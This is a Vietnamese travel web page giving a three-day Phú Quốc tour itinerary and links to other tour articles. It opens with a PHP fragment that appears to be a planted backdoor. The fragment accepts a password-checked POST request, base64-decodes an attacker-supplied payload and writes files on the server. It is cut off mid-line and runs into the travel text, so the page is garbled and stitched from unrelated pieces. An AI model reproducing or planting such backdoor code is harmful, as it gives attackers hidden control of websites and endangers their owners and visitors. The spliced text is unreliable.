function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour du lịch khám phá đảo ngọc Phú Quốc dịp Tết Dương lịch 2023 - Đi Để Đến

Tour du lịch khám phá đảo ngọc Phú Quốc dịp Tết Dương lịch 2023

08/11/2017 Đi Để Đến - Group

Ngày 1: TPHCM – Phú Quốc

Sáng: Hướng dẫn viên công ty du lịch đón quý khách tại sân bay Tân Sơn Nhất, làm thủ tục đáp chuyến bay đến Phú Quốc vào lúc 10h10.

11h10: Qúy khách đến sân bay Phú Quốc. Xe và hướng dẫn viên đưa đoàn đi tham quan dinh cậu Thủy Long Thánh Mẫu. Đây là nơi ngư dân thường tìm đến khấn vái, cầu bình an trước mỗi chuyến ra khơi.

Trưa: Đoàn đến nhà hàng dùng bữa với món đặc sản gỏi các trích, sau đó về khách sạn nhận phòng nghỉ ngơi.

Chiều: Qúy khách có thể lựa chọn đến một trong hai điểm tham quan rất nổi tiếng ở Phú Quốc là:

Vườn Thú Mở – Vinpearl Safari Phú Quốc: Được xây dựng theo mô hình Safari Singapore bán hoang dã, Vườn Thú Mở hiện đang bảo tồn và chăm sóc các loài động vật quý hiếm trong môi trường thiên nhiên mở, vừa đảm bảo được môi trường sống tốt vừa giúp các loài vật thân thiện, gần gũi hơn với con người.

tour du lịch phú quốc tết dương lịch 3n2đ

Safari Phú Quốc là vườn thú “mở” đầu tiên ở Việt Nam – Ảnh: Internet

Vinpearl Land: Là khu vui chơi, giải trí, nghỉ dưỡng phức hợp với rất nhiều trò chơi trong nhà và ngoài trời dành cho mọi lứa tuổi. Bên cạnh đó còn có rạp chiếu phim 5D, hồ bơi lớn, khu mua sắm, ẩm thực đường phố. Đặc biệt du khách sẽ được thưởng thức chương trình nhạc nước hoành tránh nhất Đông Nam Á và các lễ hội sôi động được tổ chức thường xuyên.

Chi phí tham quan tự túc. Có xe đưa đón quý khách từ khách sạn đến Vinpearl Land/ Vinpearl Safari.

Tối: Đoàn thưởng thức hải sản tươi ngon tại nhà hàng địa phương. Sau đó quý khách tự do tham quan, khám phá Phú Quốc về đêm hoặc về khách sạn nghỉ ngơi.

Ngày 2: Trung tâm nuôi cấy Ngọc Trai – Nhà tù Phú Quốc – Tắm biển – Câu cá

Sáng: Qúy khách dậy sớm ngắm bình minh, đi dạo dọc bờ biển, dùng điểm tâm sáng. Sau đó đoàn lên tàu xuất hành ra khơi. Tại đây, quý khách sẽ được trải nghiệm các hoạt động hấp dẫn như:

Câu cá, lặn ngắm san hô: Qúy khách có thể ngồi trên tàu câu cá hoặc lặn biển. Bạn sẽ được cung cấp thiết bị câu cá (dây câu, mồi), áo phao, kính lặn, ống thở khi tham gia lặn biển. Đoàn dùng cơm trưa trên tàu. Về khách sạn nghỉ ngơi.

đặt tour du lịch phú quốc tết dương lịch 3n2đ

Câu cá ngoài khơi đảo Phú Quốc – Ảnh sưu tầm

Trưa: Đoàn khởi hành đi tham quan phía Nam đảo:

Khu nuôi cấy Ngọc Trai: Nuôi, khai thác và chế biến ngọc trai là một trong những ngành kinh tế mũi nhọn của đảo. Đến đây, quý khách sẽ được tìm hiểu quy trình nuôi cấy, chế biến ra các sản phẩm từ ngọc trai.

Di tích lịch sử nhà tù Phú Quốc: Được mệnh danh là địa ngục trần gian, nơi đây đã từng giam giữ biết bao chiến sĩ cách mạng của nước ta trong hai thời kỳ chống Pháp, Mỹ.

mua tour du lịch phú quốc tết dương lịch 3n2đ giá tốt nhất

Mô hình tái hiện những trận tra tấn chiến sĩ dã man ở nhà tù Phú Quốc – Ảnh: Internet

Bãi Sao: Là một trong những bãi biển đẹp nhất Phú Quốc. Bãi Sao có bãi cát dài trắng mịn, làn nước xanh biếc và hàng dừa rợp bóng.

Chùa Hộ Quốc: Hay còn gọi là Thiền Viện Trúc Lâm Hộ Quốc. Đến đây, quý khách sẽ được chiêm ngưỡng nét kiến trúc ấn tượng, phong cảnh yên bình.

Tối: Qúy khách dùng cơm tối tại nhà hàng. Sau đó bạn có thể đăng ký chương trình Câu mực đêm (chi phí tự túc) hoặc về khách sạn nghỉ ngơi.

mua tour du lịch phú quốc tết dương lịch 3n2đ giá hấp dẫn

Bãi Sao là một trong những bãi biển đẹp nhất Phú Quốc – Ảnh sưu tầm

Ngày 3: Tham quan – Về lại TPHCM

Sáng: Qúy khách dùng điểm tâm, sau đó tự do tắm biển, về khách sạn làm thủ tục trả phòng.

Xe đưa đoàn đi tham quan chùa Sùng Hưng Cổ tự, nhà thùng nước mắm cá cơm được chế biến theo phương thức truyền thống, vườn Tiêu Suối Đá, vườn sim, suối Tranh, cơ sở sản xuất hải sản khô, làng chài cổ Hàm Ninh.

Trưa: Đoàn dùng bữa tại nhà hàng. Sau đó quý khách lên xe ra sân bay Phú Quốc, làm thủ tục đáp chuyến bay về lại TPHCM. Đến sân bay Tân Sơn Nhất, hướng dẫn viên chia tay, chào tạm biệt và hẹn gặp lại quý khách trong các hành trình sau. Kết thúc tour du lịch trong nước hấp dẫn, trọn vẹn.

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]